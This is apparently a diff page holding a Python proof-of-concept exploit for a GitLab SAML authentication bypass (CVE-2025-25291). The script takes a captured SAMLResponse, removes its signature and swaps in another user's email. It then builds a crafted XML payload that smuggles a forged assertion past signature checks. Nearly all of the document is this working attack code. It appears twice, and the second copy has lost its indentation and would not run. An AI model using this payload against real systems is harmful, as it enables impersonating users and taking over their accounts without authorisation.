testanull · March 22, 2025 10:01
diff --git a/poc-gitlab-CVE-2025-25291.py b/poc-gitlab-CVE-2025-25291.py
 import base64
 import urllib.parse

 SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE xml SYSTEM 'x" ><!--'>
 FAKE_ASSERTION
 <![CDATA[-->
 REAL_ASSERTION
 <!--]]>--></saml2p:Response>
 """
 IMPERSONATED_USER = "[email protected]"
 CURRENT_USER = "[email protected]"
 # Open and read the request.txt file
 with open('request.txt', 'r') as file:
    content = file.read()

 # Extract the value of SAMLResponse parameter
 def get_param_value(content, param_name):
    for param in content.split('&'):
        key, value = param.split('=', 1)
        if key == param_name:
            return value
    return None

 saml_response_encoded = get_param_value(content, 'SAMLResponse')

 if saml_response_encoded:
    # URL decode the SAMLResponse value
    url_decoded = urllib.parse.unquote(saml_response_encoded)
    
    # Base64 decode the URL decoded value
    try:
        decoded_resp = base64.b64decode(url_decoded).decode('utf-8')
        # Remove the first <Signature>...</Signature> block
        start_tag = "<ds:Signature"
        end_tag = "</ds:Signature>"
        start_index = decoded_resp.find(start_tag)
        if start_index != -1:

            end_index = decoded_resp.find(end_tag, start_index) + len(end_tag)
            original_resp = decoded_resp[:start_index] + decoded_resp[end_index:]
        else:
            original_resp = decoded_resp
        # <saml2p:Response

        # print(original_resp)
        start_tag = "<saml2p:Response"
        end_tag = "</saml2:Assertion>"
        start_index = original_resp.find(start_tag)
        end_index = original_resp.find(end_tag, start_index) + len(end_tag)
        if start_index != -1 and end_index != -1:
            extracted_content = original_resp[start_index:end_index]

        new_resp = extracted_content.replace(CURRENT_USER, IMPERSONATED_USER)
        payload = SKELETON_PAYLOAD.replace("FAKE_ASSERTION", new_resp)
        payload = payload.replace("REAL_ASSERTION", extracted_content)
        # Base64 encode the payload
        base64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

        # URL encode the Base64 encoded payload
        url_encoded_payload = urllib.parse.quote(base64_payload)

        # Print the final payload
        print(url_encoded_payload)

    except Exception as e:
        print(f"Error decoding SAMLResponse: {e}")
 else:
    print("SAMLResponse parameter not found in the request.")
	import base64
	import urllib.parse

	SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE xml SYSTEM 'x" ><!--'>
	FAKE_ASSERTION
	<![CDATA[-->
	REAL_ASSERTION
	<!--]]>--></saml2p:Response>
	"""
	IMPERSONATED_USER = "[email protected]"
	CURRENT_USER = "[email protected]"
	# Open and read the request.txt file
	with open('request.txt', 'r') as file:
	content = file.read()

	# Extract the value of SAMLResponse parameter
	def get_param_value(content, param_name):
	for param in content.split('&'):
	key, value = param.split('=', 1)
	if key == param_name:
	return value
	return None

	saml_response_encoded = get_param_value(content, 'SAMLResponse')

	if saml_response_encoded:
	# URL decode the SAMLResponse value
	url_decoded = urllib.parse.unquote(saml_response_encoded)

	# Base64 decode the URL decoded value
	try:
	decoded_resp = base64.b64decode(url_decoded).decode('utf-8')
	# Remove the first <Signature>...</Signature> block
	start_tag = "<ds:Signature"
	end_tag = "</ds:Signature>"
	start_index = decoded_resp.find(start_tag)
	if start_index != -1:

	end_index = decoded_resp.find(end_tag, start_index) + len(end_tag)
	original_resp = decoded_resp[:start_index] + decoded_resp[end_index:]
	else:
	original_resp = decoded_resp
	# <saml2p:Response

	# print(original_resp)
	start_tag = "<saml2p:Response"
	end_tag = "</saml2:Assertion>"
	start_index = original_resp.find(start_tag)
	end_index = original_resp.find(end_tag, start_index) + len(end_tag)
	if start_index != -1 and end_index != -1:
	extracted_content = original_resp[start_index:end_index]

	new_resp = extracted_content.replace(CURRENT_USER, IMPERSONATED_USER)
	payload = SKELETON_PAYLOAD.replace("FAKE_ASSERTION", new_resp)
	payload = payload.replace("REAL_ASSERTION", extracted_content)
	# Base64 encode the payload
	base64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

	# URL encode the Base64 encoded payload
	url_encoded_payload = urllib.parse.quote(base64_payload)

	# Print the final payload
	print(url_encoded_payload)

	except Exception as e:
	print(f"Error decoding SAMLResponse: {e}")
	else:
	print("SAMLResponse parameter not found in the request.")